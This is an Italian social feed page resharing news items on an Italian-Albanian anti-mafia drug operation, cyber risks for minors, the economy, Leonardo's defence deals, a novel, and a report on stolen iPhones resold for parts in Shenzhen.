L’operazione si incardina nel più ampio progetto investigativo della DDA di Bari e della SPAK di Tirana volto a contrastare l’incessante traffico internazionale di cocaina ed eroina, gestito dalle organizzazioni criminali albanesi. In tale contesto, in esito alle precedenti operazioni “Shefi”, “Kulmi” e “Shpirti”, tra il 2018 e il 2021 la DIA di Bari ha già dato esecuzione complessivamente a 118 misure cautelari, al sequestro di beni mobili ed immobili per diversi milioni di euro e al rinvenimento di oltre sei tonnellate di droga tra marijuana, cocaina e hashish, permettendo, nei vari gradi di giudizio, di comminare pene, per ciascun imputato, fino a 20 anni di reclusione.
L'operazione è stata eseguita su richiesta e da:
Italia: Ufficio della pubblica procuratore Bari - Direzione anti-Mafia distrettuale; Direzione Investigativa Antimafia di Bari, con il sostegno dell'ufficio dell'esperto di sicurezza presso l'ambasciata italiana di Tirana Albania: speciale procuratore anticorruzione e procura del crimine organizzato (SPAK) di Tirana; Polizia albanese
Attualità, Geopolitica e Satira reshared this.
A quali rischi cyber sono esposti i minori e cosa devono sapere i genitori
@Informatica (Italy e non Italy 😁)
Un rapporto della Polizia Postale per la Sicurezza cibernetica rilancia il tema della sicurezza dei minori, esposti a cyber rischi sempre più sofisticati e numerosi. Cosa devono sapere e cosa devono fare i genitori
L'articolo A quali rischi cyber sono esposti i minori e cosa devono sapere i genitori
reshared this
Tanto debito, poca crescita. L’Italia ancora preda del disastro Superbonus
@Politica interna, europea e internazionale
L’Italia e l’Europa hanno smesso di crescere. Un dato noto, ribadito dalle nuove stime di primavera della Commissione europea, che ha ritoccato a ribasso le previsioni per l’eurozona dell’anno in corso, dall’1,3% di novembre all’attuale 0,9%. Riviste in
Politica interna, europea e internazionale reshared this.
Leonardo si espande ancora e punta agli algoritmi predittivi made in Usa
@Notizie dall'Italia e dal mondo
Dopo la joint venture con Rheinmetall per lo sviluppo di carri armati, l’accordo con Baykar per la produzione di droni, la progettazione del caccia di sesta generazione Gcap insieme a Bae Systems e Mitsubishi e l’accordo sui satelliti con Thales, Leonardo continua
Notizie dall'Italia e dal mondo reshared this.
freezonemagazine.com/news/pave…
In libreria dal 29 Maggio 2025 readerforblind pubblica Crudeltà, il romanzo più celebre di Pavel Nilin, autore e giornalista sovietico che per anni lavorò come funzionario di polizia nelle regioni più remote della Siberia. Scritto nel 1956 durante il disgelo kruscioviano e ambientato nei primi anni dopo la rivoluzione russa, Crudeltà è un poliziesco […]
L'articolo Pavel Nilin – Crudeltà proviene
In libreria dal
Dove finiscono gli iPhone rubati? A Shenzhen c’è una torre che li rivende a pezzi
A Shenzhen, in Cina, c’è un edificio anonimo chiamato Feiyang Times, una torre grigio-marrone con colonne adornate con striscioni di propaganda. A prima vista non sembra niente di speciale, se non fosse per il soprannome che gli inglesi chiamano così su Internet: “la costruzione degli iPhone rubati”. Al terzo e al quarto piano si svolge un vivace mercato notturno di iPhone provenienti dall’Europa e dagli Stati Uniti: molti sono usati, ma alcuni, a quanto pare, erano lì contro la loro volontà.
Ed è qui che entrano in gioco gli smartphone restituiti dagli utenti occidentali in seguito a un cambio di modello, così come i dispositivi con un passato discutibile. I messaggi sui forum, sui social network e persino quelli delle vittime stesse puntano sempre più spesso allo stesso indirizzo: Huachiangbei, un distretto di Shenzhen che è diventato il fulcro della catena di rivendita di prodotti elettronici. La catena inizia con i furti in Occidente, passa per Hong Kong e termina nei negozi dell’emisfero australe.
Ad esempio, l’imprenditore londinese Sam Amrani ha perso il suo iPhone 15 Pro proprio per strada: due uomini in bicicletta elettrica lo hanno fermato all’istante e gli hanno strappato il telefono dalle mani. Una settimana dopo, il dispositivo è stato avvistato a Hong Kong e poi a Shenzhen. Sam ha pubblicato la storia su LinkedIn e ha scoperto di non essere l’unico la cui attrezzatura era stata spedita in Cina.
I venditori del mercato di Feiyang affermano che a Shenzhen c’è un acquirente per praticamente ogni parte di uno smartphone, dallo schermo agli elementi in rame. Anche i dispositivi bloccati vengono utilizzati come pezzi di ricambio. Particolarmente apprezzati sono gli iPhone provenienti dagli Stati Uniti: sono più economici a causa delle restrizioni di rete e consentono l’uso degli app store globali. Nell’area vendita si possono incontrare clienti provenienti da Pakistan, Libia, Hong Kong. Qualcuno sta cercando lotti da 200-300 dispositivi. Alcune persone hanno solo schermi e chip. Esiste addirittura una richiesta di custodie e plastica, che vengono poi rifuse.
A quanto pare, la maggior parte degli iPhone arriva a Shenzhen passando per Hong Kong, un porto franco doganale. L’edificio industriale su Hung To Road è un alveare di attività all’ingrosso, con decine di aziende che vendono dispositivi all’ingrosso, a volte contrassegnati con la dicitura “iCloud bloccato”. Molti telefoni sono già nelle mani di rivenditori provenienti da Turchia, Cina e Filippine. Le aste si svolgono su WhatsApp, WeChat e persino Facebook.
Chi ha a che fare con questi lotti sostiene di non riuscire a sbloccare i dispositivi, ma anche i telefoni “bloccati” possono essere venduti a prezzi vantaggiosi per i pezzi di ricambio. Sebbene le vittime ricevano spesso messaggi da acquirenti in Cina che chiedono o li convincono a rimuovere il blocco di attivazione. A volte minacciano direttamente.
La direzione dell’edificio del Feiyang Times ha rifiutato di rilasciare dichiarazioni. L’ufficio ha riferito che i venditori lavorano come privati e sono responsabili personalmente dell’assortimento. La polizia di Hong Kong ha dichiarato che avrebbe agito nel rispetto della legge se ne avesse avuto i motivi. Il governo di Shenzhen non ha risposto alla richiesta.
L'articolo Dove finiscono gli iPhone rubati? A Shenzhen c’è una torre che li rivende a pezzi proviene da il blog della sicurezza informatica.
🧊 freezr 🥶
Unknown parent • • •@DataKnightmare @Informa Pirata
Applausi! 👏👏👏
Informa Pirata likes this.
Informatica (Italy e non Italy 😁) reshared this.